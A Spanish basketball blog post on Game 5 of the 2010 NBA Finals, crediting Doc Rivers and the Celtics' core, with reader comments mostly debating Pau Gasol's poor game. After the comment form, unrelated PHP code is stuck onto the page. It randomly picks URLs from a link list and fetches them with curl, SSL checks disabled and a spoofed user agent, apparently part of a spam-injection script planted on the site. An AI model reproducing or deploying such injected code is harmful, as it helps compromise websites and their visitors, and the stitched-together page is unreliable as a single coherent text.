Finales 2010 (5º partido): Los Intocables de Doc Rivers

14 de June de 2010 por TheDeerHunter

Llega un momento en el que aquel viejo sobrenombre por el que se hacía referencia a los Celtics campeones de hace dos temporadas, el “Big Three”, queda obsoleto. Se barajaba hasta hace bien poco que el nombre dejaba de tener sentido como tal por el declive físico de Garnett, Allen y Pierce, la genuina tríada. Lo que queda demostrado, pase lo que pase de aquí al final, es que hay que leerlo al revés, que lo del “Big Three” puede seguir vigente en cuanto a sus miembros originales pero que para ser justos hay que incluir obligatoriamente en el apelativo a Rondo y Rivers. Sin alguno de estos cinco nombres no puede entenderse el gran éxito de la franquicia del trébol este año.

Se me ocurre que para esta combinación ganadora de jugadores y técnico que hasta la fecha jamás ha sido doblegada en playoffs (recordemos que el año pasado Garnett no estaba) sería difícil encontrar un nombre más descriptivo que “Los Intocables” eludiendo el numérico y aludiendo al verdadero líder hoy por hoy del equipo: Doc Rivers.

Anoche Los Intocables fueron más “ellos” que nunca, cuajando su mejor partido del curso con las verdaderas señas de identidad verdes más a flor de piel que nunca. Defensa, compromiso y solidaridad. Cada punto de ventaja una trinchera excavada. Que a nadie confunda el resultado: fue un palizón en toda regla que sólo pudo maquillar el genio de Kobe, en uno de los mejores actuaciones individuales de la historia en el tercer cuarto y que no sirvió para nada.

Partido sublime del enterrado Garnett, que anoche se las devolvió todas juntas a Gasol. Resolutivo Pierce, que se pasó la defensa de Artest por salva sea la parte. Jerárquico Rondo en la dirección y titánico Allen en su defensa, aunque parezca lo contrario por la portentosa actuación de Kobe (no olvidemos que no pudo anotar en los últimos 5 minutos decisivos). Todo ello aderezado por la táctica impecable puesta sobre la mesa por Rivers, por supuesto. Suya es el alma de este equipo.

Nadie puede negar ya que “Los Intocables” son duros de pelar. Ahora al Staples, cuando lo más habitual ha sido que el equipo que haya ganado el 5º termine imponiéndose. Suena más fácil de lo que será. Los Lakers y Kobe no han dicho su última palabra todavía.

PREMIOS

MVP: Destacando a Pierce y Rondo, el MVP de hoy se lo vamos a otorgar al “acabado” Kevin Garnett que le endosó un doble-doble de 18 puntos y 10 rebotes a Gasol, además de volverlo loco en defensa.

Decepción: La segunda línia de los Lakers está más perdida que nunca. Ante la baja forma de Bynum, Lamar Odom no termina de asumir su responsabilidad. Ron Artest es todo defensa y ayer, ni eso. Y a Derek Fisher se le ha olvidado ser tan bueno en estos dos últimos dos partidos.

Esfuerzo en vano: 38 puntos, la mitad de ellos en un tercer cuarto que puede ser considerado histórico. A veces ya no sé si hablo de Kobe Bryant o Michael Jordan.

Comenta

22 comentarios a esta entrada

  1. tyr dice:
    #1

    yo no estoy viendo un arbitraje muy imparcial… ¿opiniones al respecto?

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Impecable y solitario partido de Bryant, aunque por achacarle algo diría que lo suyo hubiese intentar involucrar al personal. En el tercer cuarto parecía infalible.

    La estadísticas de los equipos que ganan el quinto poniéndose 3-2 se debería subdividir en equipos que van a jugar a casa, y equipos que van a jugar fuera. De todos modos es del 76% a favor de los del 3. Almenos los lakers no tienen margén de error.

      Citar

  3. Nagenal dice:
    #3

    Buenos días, primero felicidades a todos por el blog, es reamente interesante y está muy bien escrito. Yo, honestamente, veo la eliminatoria todabía muy igualada, no creo que esta última victoria sea tan clave (si lo habría sido de caer del lado de LA). Lo más lógico será que los Lakers ganen el sexto y que se decida todo a cara de perro en un séptimo partido que sería de una intensidad terrible. Ahí los Celtics estarían más preparados pero jugandose en Los Angeles es dificil darlos como favoritos. Muchos juzgan esta final como fea, pero a mi me esta resultando apasionante. Saludos!

      Citar

  4. kantonyo dice:
    #4

    Una victoria de Boston este año puede ser demoledora para el aficionado amarillo….

      Citar

  5. Txusma dice:
    #5

    Y os imagináis si es en el séptimo partido? Después del rollo de la venganza y tal y cual, la moral por los suelos…

      Citar

  6. Txusma dice:
    #6

    Por cierto, otro 0 de 4 en triples de Ray Allen. 1 de 19 ya dsd la racha

      Citar

  7. mmmm dice:
    #7

    Ayer vi a Garnett en su salsa. Y a los lakers planos, desmoralizados, impotentes.
    Me gusta…

      Citar

  8. TheDeerHunter dice:
    #8

    Cualquier victoria de Boston es jodida de tragar… pero (perogrullo) lo es más cualquier derrota Lakers.
    La derrota es posible (como siempre lo ha sido) pero en cualquier caso sería contra un gran equipo, que pase lo que pase se ha merecido el campeonato.

    Pronostiqué un 4-2… y aunque os parezca mentira la cosa no está siendo tan distinta como imaginaba en un principio.
    Me parece que el asunto no está tan mal como se sugiere. Lo veo muy parecido a cómo estaban los Celtics hace dos partidos… y los tuvimos contra las cuerdas durante buena parte del 4º. Creo firmemente en que los Lakers darán todo en el 6º y después ya hablaremos del último, que tendría miga.
    Si no es así habrá que quitarse el sombrero y esperar a la siguiente oportunidad. Como siempre, por otro lado.

      Citar

  9. univerzee dice:
    #9

    Me anticipo y lo sé, Gasol puede hacer dos partidazos y taparme la boca, pero creo que te ha faltado mucho, y mucha cera para Gasol. Casi admite todo, apatico, desganado, fallón, por momentos chulesco, provocador, sobretodo con Perkins… miedoso, no se, y aún oigo, leo que tal vez si Kobe involucrase más a sus compañeros… vamos a ver que son las finales de la NBA una ocasión unica, no se necesita motivar al personal para eso. No lo digo por nadie en concreto, sino por todos los que critican a Kobe porque no involucra, o porque se las chupa… coño!! que se las chupa porque se las pasan, porque los demás no tienen… a tirarlas, y sobretodo Gasol… que decepción anoche, inmensa. Me jode sobremanera leer crónicas repartiendo a Artest porque Pierce le hace un traje, si, y Kobe a Allen y Allen y no pasa nada… Artest no es el lider de este equipo es una ruedita más en el engranaje, y cuando se quiere ser colider se debe dar ejemplo. 12+12 si… y que? Fatal!! Estoy muy decepcionado. Y cuando leo ya que esta cansado… es que me subo por las paredes, porque ves a Bynum cojo, sin frenos, sin rodilla, y el tío dejándose media carrera baloncestistica, cierto que renovó a buena pasta, pero seguramente ya no vuelva a renovar, no vuelva a firmar ningún contrato como el que firmó y el tio esta ahí quedándose invalido. Me enciendo!!!

      Citar

  10. PIRATA dice:
    #10

    Me sabe muy mal decirlo pero estoy completamente de acuerdo con univerzee, no me esperaba un partido tan, tan, flojo de Pau…decepción es poco.
    De todas maneras siempre he sido optimista y apuesto por que Kobe les ponga las pilas a todos de cara al 6º, creo que si ganan, el 7º no hará falta……

      Citar

  11. kantonyo dice:
    #11

    Gasol no tiene ayuda en la pintura, les está pasando lo mismo que hace 2 años.

      Citar

  12. Dropkick Murphys dice:
    #12

    Bienvenidos a la hegemonía verde!

      Citar

  13. TheDeerHunter dice:
    #13

    Comprendo tu cabreo, Uni… pero no lo comparto.
    Es innegable que anoche Gasol estuvo como el culo. Lo mismo que uno de cada dos partidos desde la serie contra Phoenix. Todo esto me parece circunstancial… por las circunstancias que le rodean. Hay otros que se pueden permitir el ir al 100% pero él no, porque debe de regular fuerzas en ataque y en defensa. Hay otros que también deben regular (como la defensa de Kobe en muchos partidos, que no dices nada) pero tampoco se llevan tanto desgaste como Gasol en la zona (que le defienden por lo civil y lo criminal empujando con todo lo que pueden)
    Todavía hay mucho que decir a eso… si falla una vez más Gasol los Lakers pierden, es así de sencillo. Pero me remito a lo que dijo Kobe: “Gasol se puede permitir un partido malo”. No podemos decir lo mismo de Odom o Artest, en este caso. Ellos son muy responsables de lo que le pasa a Gasol.

    Ojo, tampoco estoy de acuerdo con criticar a Kobe anoche, de ninguna de las formas. Unos crían la fama…

    No nos volvamos locos que todavía queda tema. Esto no es ni más ni menos que lo normal en una eliminatoria tan igualada.

      Citar

  14. pablito dice:
    #14

    Go Celtics.
    Toda la razón en ensalzar la labor del cuerpo técnico de los Verdes. Phil es muy bueno, pero no tanto como su palmarés dice.

      Citar

  15. univerzee dice:
    #15

    No The, yo ha Gasol le permito lo que quiera, y a quien sea. Pero no se puede hacer declaraciones siempre “casi”situandose al nivel de Kobe… es que el es asi, hay que jugar más por dentro, es que hay que… sus clasicas chinitas y despues no responder. Y a Kobe le doy, claro no era el día pero le doy, pero no a el, le doy a PJackson porque desde principio de serie dije que Fisher se bastaba para marcar a Rondo… al menos para marcarlo como lo esta marcando kobe, fatal… y a poco que el chico hace lo que toca, tirar cuando esta solo aunque falle pues las cosas le funcionan… el primer día le entro una empanada, a Rondo, al verse 2 metros solos y preguntarse que leches hacia, si tiraba o pasaba… pero después… como aquí dicen y dices tu, Rivers, el gran artifice de estos Celtics, y de aquellos del 2008, le ha dado las pautas correctas, tira aunque falles, pero no me destroces todo el sistema por no tirar ni penetrar ni pasar bien porque tienes a un tio tapandote dos metros atras. Lo dicho, Fisher se basta para marcar a Rondo, y aunque meta rondo 50 puntos ganan LAL, quien no los tiene que meter es Pierce o Allen.
    Y volviendo a Gasol, lo que no se puede es ir protegiendolo porque esta solito etc etc y despues equipararlo a otros jugadores de la liga presentes o pasados que se han buscado ellos solos el parné… el no es ni Odom ni Artest, viene a tener como que el doble de responsabilidad, por juego, y dolares.
    Si falla Gasol pierden, puede, pero como falle Kobe, casi emjor que ni lo intenten. Si de Gasol se dice que tenia que estar en el primer quinteto NBA o en el segundo… habra que exigirle como tal, no como a odom o Artest, o Bynum… si es topten en Efficiency habra que exigirle asi, y nada más, y si lo es en salario pues igual.
    Entre los top de estas finales, KG,PPierce, Kobe, Gasol y Gasol es el más flojo con diferencia… y puede, no miro numeros, que por estadistica no, pero por presencia de animo si.

      Citar

  16. CAMPO2 dice:
    #16

    Yo lo que creo es que David Stern se debe estar frotando las manos con estas finales, ahora seguro que nadie hecha de menos el enfrentamiento entre Lebron y Kobe, 6º partido para Lakers si hace falta con ayuda arbitral y en el 7º que gane el mejor y a vender la NBA por el resto del mundo estara pensando el Señor comisionado

      Citar

  17. TheDeerHunter dice:
    #17

    tío uni… todo lo que dices es correcto, pero da la casualidad de que estos playoffs hemos visto partidos horrorosos de todo el mundo: de Durant, de LeBron, de Wade, de Kobe, de Howard, de todos los de los Celtics. Me jode que Gasol haga un partido tan malo como el de ayer pero una cosa es no protegerlo y la otra es tirarlo a la hoguera a las primeras de cambio.

    Me parece correcto lo del nivel de exigencia, pero también hay que encuadrar esos comentarios en el contexto. Y el contexto es que tal y como están las cosas, igual que hace dos años, Gasol no puede jugar al 100% en ambos lados de la cancha, porque si por una de esas le pasa como a Kobe o a Artest y se mete en problemas de faltas la cagada es de tres pares de cojones. Aunque parezca mentira con los otros dos se pueden poner alternativas aunque sean malas, con Gasol ni eso.

    Y lo de las declaraciones: Más razón que un santo siempre. Y posiblemente los Lakers llevan una derrota más por culpa de lo que Gasol denuncia. No lo olvidemos.

      Citar

  18. univerzee dice:
    #18

    Que no parezcan mis comentarios que mando a la hoguera a Gasol, nada, ni mucho menos, si me irrita es porque digamos que aprecio al paisano, sino me la traeria al fresco… y porque soy de LAL claro.
    Pero creo que todo el mundo ha tenido días malos, pero no se, lo de Gasol roza la apatia, no es como Allen el otro día que mete 7 seguidos y despues falla otros 7 o más, pero vamos que esta sólo y las tira… Gasol no.
    Tranquilos tengo una cualidad resucito a la gente, seguro que hace dos partidazos y chitón.

      Citar

  19. Marcaco dice:
    #19

    pues yo creo es Phil el q se esta luciendo…

      Citar

  20. Nacho dice:
    #20

    Sobre el debate de Gasol.
    Vale que no fue un buen partido por su parte. Pero tampoco horroroso. Por partes y según recuerdo:
    Al final del segundo cuarto llevaba 1 de 2 en tiros, los dos tras rebote ofensivo. En los dos últimos minutos falló dos tiros en las dos primeras bolas que le pasaron en posición de jugársela, y muy forzados, seguramente no dobló la bola por desesperación, porque no sabría cuando tendría otra. Salió mucho a la línea de tres para circular la bola. Si fue decisión suya, podremos decirle que se acojonó cerca del aro, pero no lo creo. Si fue el tío Phil, mal vamos si no tenemos a nadie que sepa circular en los exteriores.
    Cerró el rebote defensivo durante todo el partido más o menos bien, si no cogió más es porque no es un tío que se tire a por todas las bolas teniendo un compañero al ladoc omo hacen los tripledoblistas (perdón por el término) como LeBron. Estuvo bien en el rebote de ataque, y mal en los palmeos de ahí su 4 de 11. Pero nunca recibió el balón en condiciones como en los dos primeros partidos.
    Respecto a la defensa; no creo que KG la ganara demasiado la partida. Muchos de los puntos de Garnett fueron ante otros defensores (recuerdo una a Odom que ni Yao con la cintura de Petrovic la hubiera defendido- no solo hay malas defensas, también hay buenos ataques, algunas veces imposibles de defender)
    Kobe se salió en el tercer cuarto, y no es que chupara, hizo lo que debía, el problema es si el juego exterior solo lo busca a él y nada mira a la pintura. ¿Quién debería corregir eso, Phil?
    Gasol esuna máquina, pero también falla, y falló más, bastante más, en el 4º. Vale que metió veintitantos, pero ¿rebotes? y¿rebotes defensivos? ¿Quién ganó ese cuarto partido? Glenn Davis comanadando a los verdes en el rebote ofensivo. Culpa, entre otros, de Gasol.
    Noticia interesante de Lakers en el 5º, que eso lo corrigieron.
    Noticia preocupante, que no corrigieron las alternativas en ataque. Fisher se mojó poco, y Artest tiró demasiado sin acierto. Sin contar que la pintura ni la miraron.
    ¿Qué pasará esta noche? Espero que algo más corrijan los Lakers y que paren a la segunda unidad de Celtics, que hoy les toca.
    Ah! al bueno de Artest nada que objetar en defensa, normal que Paul Pierce se saliese algún día.

      Citar

  21. TheDeerHunter dice:
    #21

    Pensando un poco en toda la problemática de Gasol… creo que su fisonomía y su expresión corporal no le beneficia frente a las acusaciones de blando y de apático.
    Sus brazos tan largos, su manera de dejarlos caer con los hombros cuando está cansado, sus problemas en los desplazamientos laterales cuando no anda fino, y su conocimiento en no ir a por todos los rebotes como dice nacho hace ver algo que en mi opinión no es.
    Yo siempre he dicho que el gran problema de Gasol es que tiene un físico vulnerable en cuanto a la resistencia se refiere. El año pasado pareció quitarme la razón… espero que no me la devuelva este año.

      Citar

  22. TheDeerHunter dice:
    #22

    Resurrección made in univerzee
    falta otro

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>